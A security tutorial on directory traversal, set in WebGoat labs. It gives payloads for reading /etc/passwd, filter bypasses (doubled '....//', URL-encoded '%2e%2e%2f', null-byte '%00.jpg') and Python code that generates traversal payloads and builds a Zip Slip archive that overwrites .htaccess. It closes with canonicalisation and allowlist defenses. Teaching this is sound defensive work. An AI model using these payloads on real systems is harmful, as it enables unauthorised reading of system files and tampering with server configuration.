A full grasp of directory traversal vulnerabilities, from 0 to 1

0x01 what is a directory traversal vulnerability

A directory traversal (path traversal) vulnerability arises when a website builds a filesystem path from user-controlled input without constraining it, or when a configuration defect lets the website's directory be browsed at will. Either way, many files and directories that were meant to stay private leak out.

For example database backup files, configuration files and so on. An attacker uses this information to prepare the next step of the intrusion into the site.

In simple terms, I personally think of directory traversal more as a trick, one that is chained with other attacks, and one I use more often than CSRF or CORS.

As early as my first contact with directory brute-forcing tools such as dirb, Yujian (御剑) and Burp Suite, being able to sweep out a few live directories already felt to me like a kind of directory traversal vulnerability. Strictly speaking that is directory enumeration (guessing paths that exist) rather than traversal (escaping the directory the application intended), but enumeration is usually how you find the resource endpoint that traversal is then tried against.

  • All in all, this class of bug has to be probed for often and patiently.
  • Wherever the site serves resources from the filesystem, directory traversal is highly likely to be worth testing.

0x02 several directory traversal attack vectors

One point to be particularly clear about: directory traversal attacks are built on the operating system's path semantics. On Linux, for example, `cd ..` moves to the parent directory, and the same `..` segment works inside any path the server hands to the filesystem.

  • `../` runs through the entire directory traversal attack and is its core.

If the target server is Linux, the attack is carried by `../`; stacking it as `../../` (and so on) climbs one more level each time. Windows accepts both `..\` and `../`, so the forward-slash form is the usual first try whatever the operating system.

1. Exploiting a directory traversal vulnerability through file upload

Lab: WebGoat, Path Traversal, lesson page 2

  • The lesson briefly describes exploiting directory traversal through a file upload.

Lab interface (screenshot)

  • The task asks us to upload a picture to a directory other than the intended one.
  • The intended upload directory is /PathTraversal/user/tests; with directory traversal we can write the image into another directory.

The target runs Linux, so `../` is what completes the directory traversal.

Capture the upload request with Burp Suite and change the value "test" to "../test", which points one level above the /test directory.

As shown in the figure, the avatar ends up in the /PathTraversal/user directory.


2. A directory traversal attack on resource endpoints that exist on the site

  • Resource endpoints that exist on the site: resources such as images. Try to traverse directories while requesting the image.

For example, suppose image resources live under the directory

127.0.0.1/home/image

and there is a file at 127.0.0.1/home/password.txt.

The image is fetched through a GET parameter, so the URL that loads it is

127.0.0.1/home/image?filename=1.jpg

The /home directory itself is certainly not exposed directly. But if we change the filename value to ../1.jpg, the request becomes

127.0.0.1/home/image?filename=../1.jpg

which reads from the /home directory instead. So, far from being out of reach, the request only has to be rebuilt with filename=../password.txt:

127.0.0.1/home/image?filename=../password.txt

Next we drill down a bit with a lab that traverses from an existing resource endpoint.

Lab: directory traversal from existing resource endpoints

  • The lab asks us to retrieve the /etc/passwd file.

Lab interface (screenshot)

Capture the traffic, click on the image to obtain the GET request for it, and start the directory traversal attack on that request directly.

The first attempt returned 400: `../` was not rejected, so the server applies no restriction on traversal, but the requested file was not found at that level. Go up one more level with `../../`. That also fails; don't worry, keep trying.

Finally, the third level succeeded! It's not easy...

The /etc/passwd file itself is a very important file in Linux: it lists the system's accounts.

The screenshots give a real sense of how exploitable this class of bug is: at the light end, information disclosure; at the heavy end, getting a shell.
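As an added example (not code from the original article), the following Python models the vulnerable `image?filename=` handler above together with the attacker's "one more level" loop from the lab. The serving directory `/var/www/app/home/image` and the URL base are assumptions for the demonstration. It shows two things the write-up only describes: each extra `../` climbs one level, so the payload needs at least as many `../` as the serving directory is deep; and `..` at the filesystem root stays at the root, so overshooting with extra `../` is harmless and a long prefix is the cheap first probe.

```python
import posixpath
from urllib.parse import quote

# Assumed serving directory for the `image?filename=` handler. The real value
# on a target is unknown; the depth loop below is how you cope with that.
IMAGE_DIR = "/var/www/app/home/image"
BASE_URL = "http://127.0.0.1/home/image"   # from the example above


def resolve_vulnerable(base_dir: str, filename: str) -> str:
    """Model of a handler that opens base_dir + "/" + filename with no check.
    The OS collapses every `..`, so the result can be anywhere on disk.
    `..` at the root stays at the root, which is why overshooting is harmless."""
    return posixpath.normpath(posixpath.join(base_dir, filename))


def traversal_payloads(target: str, max_depth: int = 8) -> list:
    """`../` prefixes of increasing depth for an absolute target path, the
    same thing as adding one `../` per attempt by hand."""
    rel = target.lstrip("/")
    return ["../" * depth + rel for depth in range(1, max_depth + 1)]


def request_url(payload: str) -> str:
    """The URL you would actually send; '.' and '/' are left unencoded."""
    return BASE_URL + "?filename=" + quote(payload, safe="/")


def first_working_depth(base_dir: str, target: str, max_depth: int = 8):
    """Smallest number of `../` at which the vulnerable resolver reaches
    `target`, or None if max_depth is not enough. Models the lab loop:
    try one level, fail, add another, until the file comes back."""
    for depth, payload in enumerate(traversal_payloads(target, max_depth), start=1):
        if resolve_vulnerable(base_dir, payload) == target:
            return depth
    return None


if __name__ == "__main__":
    print(resolve_vulnerable(IMAGE_DIR, "../password.txt"))
    depth = first_working_depth(IMAGE_DIR, "/etc/passwd")
    print("levels needed:", depth)
    print(request_url(traversal_payloads("/etc/passwd", depth)[-1]))
    # Overshooting still lands on the target:
    print(resolve_vulnerable(IMAGE_DIR, "../" * 20 + "etc/passwd"))
```

In practice you do not know the depth, so the first payload worth sending is one with many `../` (a dozen is common); if that is blocked or fails, fall back to the one-level-at-a-time loop to learn what the filter tolerates.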

3. For Zip files: in a file upload, replace the avatar upload with an archive and use directory traversal inside it

  • The scenario is the file upload interface again, but it is a very special case. Long ago, when people paid little attention to this, Zip archives could be uploaded as files and were extracted on the server.
  • An attacker uses `../` in an entry's name to change where that file inside the Zip is written.

Obviously this is still part of file upload, but it deserves to be pulled out and discussed separately.

After the Zip is extracted, with a carefully crafted archive it is very likely to overwrite an existing file on the server. The best-known case in PHP is overwriting the .htaccess file: if .htaccess is overwritten, it is a big problem. This archive-entry variant is generally known as Zip Slip.
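An added Python example (not from the original article) of the archive case: it builds a constructed Zip whose second entry is named `../../.htaccess`, extracts it with a hand-rolled loop that trusts entry names, and then with a hardened loop that canonicalises every target and refuses the archive before writing anything. The `.htaccess` content and the directory layout are invented for the demonstration. Note that Python's own `ZipFile.extractall` strips `..` from entry names, so the vulnerable loop here stands in for older or hand-written extractors, not for `extractall`.

```python
import io
import os
import tempfile
import zipfile


def build_malicious_zip() -> bytes:
    """Constructed sample archive: one harmless entry plus one whose name
    climbs out of the extraction directory (the Zip Slip pattern)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("avatar.png", b"not really a png")
        # The entry name is attacker-controlled; nothing stops it containing "..".
        zf.writestr("../../.htaccess", b"AddType application/x-httpd-php .png\n")
    return buf.getvalue()


def extract_unsafe(data: bytes, dest: str) -> list:
    """Vulnerable extractor: trusts each entry name and joins it to dest.
    Returns the paths actually written."""
    written = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            out = os.path.normpath(os.path.join(dest, info.filename))
            os.makedirs(os.path.dirname(out), exist_ok=True)
            with zf.open(info) as src, open(out, "wb") as dst:
                dst.write(src.read())
            written.append(out)
    return written


def extract_safe(data: bytes, dest: str) -> list:
    """Hardened extractor: canonicalise every target path and require it to
    stay under dest. All names are validated before anything is written, so
    a bad archive leaves no partial output behind."""
    root = os.path.realpath(dest)
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        targets = []
        for info in zf.infolist():
            out = os.path.realpath(os.path.join(root, info.filename))
            if os.path.commonpath([root, out]) != root:
                raise ValueError(f"zip slip entry rejected: {info.filename!r}")
            targets.append((info, out))
        written = []
        for info, out in targets:
            os.makedirs(os.path.dirname(out), exist_ok=True)
            with zf.open(info) as src, open(out, "wb") as dst:
                dst.write(src.read())
            written.append(out)
    return written


def demo() -> dict:
    """Run both extractors on the sample archive inside a scratch directory
    and report which files escaped and whether the safe extractor refused."""
    root = tempfile.mkdtemp(prefix="zipslip-")
    unsafe_dest = os.path.join(root, "uploads", "u1")
    safe_dest = os.path.join(root, "uploads", "u2")
    os.makedirs(unsafe_dest)
    os.makedirs(safe_dest)
    data = build_malicious_zip()

    unsafe_written = extract_unsafe(data, unsafe_dest)
    escaped = [p for p in unsafe_written if not p.startswith(unsafe_dest + os.sep)]

    try:
        extract_safe(data, safe_dest)
        safe_error = None
    except ValueError as exc:
        safe_error = str(exc)

    return {
        "escaped": escaped,          # files the unsafe loop wrote outside u1
        "safe_error": safe_error,    # why the safe loop refused the archive
        "safe_dest_files": os.listdir(safe_dest),  # nothing: refused before writing
    }


if __name__ == "__main__":
    print(demo())
```

The escaped file lands two levels above the upload directory, which in a real deployment is exactly where a web root or its `.htaccess` would sit. The same `realpath` plus `commonpath` check is the one to apply to any path built from a name you did not choose yourself.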

0x03 Directory traversal bypasses of common defenses

1. Defense against a simple `../` traversal

When the server-side code filters `../`, for example with this code:

return super.execute(file, fullName != null ? fullName.replace("../", "") : "");

the input is processed and every `../` is replaced with an empty string.

We bypass it by double-writing: input `....//`. The single replace pass removes the inner `../` and what remains is `../`, so the traversal sequence survives the filter and the bypass succeeds.

Lab: WebGoat Path Traversal, lesson page 3

  • The source code of this common defense is shown in the figure.

The bypass is shown in the figure.

2. The GET parameter is not allowed to contain `../`

Recall the earlier example: a directory traversal attack on a resource endpoint that exists on the site.

There we requested the resource through a GET parameter. If the parameter is not allowed to contain `..` or `/`, a directory traversal attack is harder to carry out, but there is always a way to bypass it.

  • Principle: the check runs on the raw query string, and only afterwards does the server URL-decode the parameter value it actually uses. If the filter only looks for the literal characters, URL-encoding them bypasses it and the decoded `../` reaches the filesystem untouched. If the filter also blocks a raw `/`, encode the slashes in the rest of the path as `%2f` too.
  • Payload
?filename=%2e%2e%2f/etc/passwd

%2e%2e ——> .. %2f ——> /

This gets around the check. For the specific lab, see WebGoat Path Traversal, lesson page 5.

  • The source code of the defense is shown in the figure.

Bypassed using URL encoding.

3. When the server only allows resources of the current format to be fetched

  • Scenario: the resource is an image, and the server only accepts requests whose filename ends in an image extension, for example ?filename=1.jpg.
  • Bypass: null byte bypass

The original payload

?filename=../etc/passwd

is bound to produce an error, because the server restricts what may be requested.

The null byte bypass appends a NUL byte (0x00, URL-encoded as %00) followed by the expected suffix: the extension check sees the whole string and passes it, but a C-style file API reads the path only up to the first NUL. So we construct a new payload:

?filename=../etc/passwd%00.jpg

After the runtime truncates at the null byte, the path actually opened is

?filename=../etc/passwd

and the extension check is bypassed. Note that %20 is a space, not a null byte; a trailing space does not terminate the string. Note also that this relies on an old runtime: current PHP and Java versions reject paths containing NUL, so check the target's version before counting on it.
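The three bypasses of this section, as an added Python example that is not code from the original article or from WebGoat: each weak filter is modelled as a small function, written weak on purpose, and paired with the payload that defeats it. The filter details (a single replace pass; a check on the raw query string followed by decoding; an extension check followed by a NUL-truncating file API) are assumptions that follow the descriptions above, not WebGoat's exact source. The second bypass goes slightly beyond the text by also encoding the slashes in the rest of the path, which survives a filter that blocks raw `/` as well as `..`.

```python
from __future__ import annotations

from urllib.parse import unquote

# Three weak filters modelled on the three defenses above. They are the
# "before" code and deliberately weak, so that each bypass can be shown.


def filter_strip_once(name: str) -> str:
    """Defense 1: a single replace pass that removes the literal "../"."""
    return name.replace("../", "")


def filter_raw_query_then_decode(raw_value: str) -> str | None:
    """Defense 2: reject ".." or "/" in the *raw* (still URL-encoded) query
    value, then URL-decode it for use. The check and the use see different
    strings. Returns None when blocked, else the decoded value the handler
    would open."""
    if ".." in raw_value or "/" in raw_value:
        return None
    return unquote(raw_value)


def filter_extension_then_c_open(decoded_name: str) -> str | None:
    """Defense 3: require an image extension on the full string, then hand
    the path to a C-style API that reads only up to the first NUL byte.
    Assumed to model old PHP/Java behaviour; current runtimes reject NUL,
    and this bypass then fails."""
    if not decoded_name.endswith(".jpg"):
        return None
    return decoded_name.split("\x00", 1)[0]   # what the OS actually opens


# The matching bypass payloads. `target` is an absolute path such as
# "/etc/passwd"; `depth` is how many levels to climb.


def bypass_strip_once(depth: int, target: str) -> str:
    """"....//" loses its inner "../" in one pass and leaves "../" behind."""
    return "....//" * depth + target.lstrip("/")


def bypass_raw_query(depth: int, target: str) -> str:
    """Encode every byte of "../" so the raw-value check never sees it;
    the slashes inside the target are encoded too."""
    return "%2e%2e%2f" * depth + target.lstrip("/").replace("/", "%2f")


def bypass_extension_check(depth: int, target: str) -> str:
    """Terminate the real path with %00 and append the suffix the check
    wants. This is the URL-encoded form; unquote() gives the decoded value."""
    return "../" * depth + target.lstrip("/") + "%00.jpg"


def demo() -> dict:
    """Apply each bypass to its filter and return what the handler ends up
    opening (None means the filter blocked the request)."""
    return {
        "strip_once": filter_strip_once(bypass_strip_once(2, "/etc/passwd")),
        "raw_query_blocked": filter_raw_query_then_decode("../../etc/passwd"),
        "raw_query": filter_raw_query_then_decode(bypass_raw_query(2, "/etc/passwd")),
        "extension_blocked": filter_extension_then_c_open(unquote("../etc/passwd")),
        "extension": filter_extension_then_c_open(
            unquote(bypass_extension_check(2, "/etc/passwd"))),
    }


if __name__ == "__main__":
    for name, opened in demo().items():
        print(f"{name:>18}: {opened!r}")
```

All three filters fail for the same underlying reason: they inspect a different string from the one the filesystem eventually receives (before a replace, before decoding, before truncation). That is why the defense in the next section checks the canonical path, not the raw input.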

0x04 The ultimate defense against directory traversal

  • The defenses discussed so far are simple ones and not top-notch; next we introduce methods that defend well against directory traversal.

1. Restrict the path the user can enter to a fixed directory.

2. Canonicalize the path

When the user requests a file or directory, URL-decode the input exactly once, then normalize the full path (resolve `.`, `..`, repeated slashes and symbolic links) and verify that the result still lies under the intended base directory. Once the check is made on the canonical path rather than the raw characters, `../` can no longer take effect, and there is no directory traversal.

3. Verify that the user's input is on an allowlist

That is, limit what the user may request: for a small set of files (such as images), write a regular expression describing the permitted names and check every request against that allowlist. Together with canonicalization, this gives a sound defense against directory traversal vulnerabilities.
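The three defenses above combined, as an added Python example that is not from the original article: decode once, check against an allowlist, then canonicalise and confirm the result stays under the base directory. `IMAGE_DIR`, the regular expressions and the function names are assumptions. A second, looser allowlist that permits subdirectories is included to show why the canonicalisation check matters even after a regular-expression check passes.

```python
import os
import re
from urllib.parse import unquote

# Assumed serving directory; not from the original article.
IMAGE_DIR = "/var/www/app/home/image"

# Strict allowlist: a bare base name plus an image extension. No "/" and no
# extra ".", so a traversal sequence cannot even be expressed.
STRICT_IMAGE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.(jpg|jpeg|png|gif)$")

# Looser allowlist that permits subdirectories. On its own it lets "../"
# through, which is exactly the case the canonicalisation check exists for.
LOOSE_IMAGE_PATH = re.compile(r"^[A-Za-z0-9_./-]{1,128}\.(jpg|jpeg|png|gif)$")


def safe_image_path(base_dir: str, raw_filename: str,
                    pattern=STRICT_IMAGE_NAME) -> str:
    """Resolve a user-supplied filename in three layers:
    1. URL-decode exactly once (frameworks normally do this for you; never
       decode again later, or %252e%252e%252f turns into "../");
    2. reject NUL bytes and anything outside the allowlist before touching
       the filesystem;
    3. canonicalise the joined path (".", "..", doubled slashes, symlinks)
       and require it to remain inside base_dir."""
    name = unquote(raw_filename)
    if "\x00" in name:
        raise ValueError("NUL byte in filename")
    if not pattern.fullmatch(name):
        raise ValueError("filename not in allowlist")
    root = os.path.realpath(base_dir)
    path = os.path.realpath(os.path.join(root, name))
    if os.path.commonpath([root, path]) != root:
        raise ValueError("path escapes base directory")
    return path


def check_filename(raw_filename: str, pattern=STRICT_IMAGE_NAME) -> tuple:
    """(accepted, reason) for a raw query value; handy for tests and logs."""
    try:
        safe_image_path(IMAGE_DIR, raw_filename, pattern)
        return True, "ok"
    except ValueError as exc:
        return False, str(exc)


if __name__ == "__main__":
    # The payloads from the bypass section, each against both allowlists.
    for raw in ["1.jpg", "../password.txt", "....//....//etc/passwd",
                "%2e%2e%2f%2e%2e%2fetc/passwd", "../etc/passwd%00.jpg",
                "sub/../../a.jpg"]:
        print(f"{raw!r:>34}: strict={check_filename(raw)} "
              f"loose={check_filename(raw, LOOSE_IMAGE_PATH)}")
```

With the strict allowlist the canonicalisation check never fires, because nothing containing `/` or `..` gets that far; it is still worth keeping, since allowlists tend to be loosened over time (the `LOOSE_IMAGE_PATH` case) and the path check is what catches the escape then.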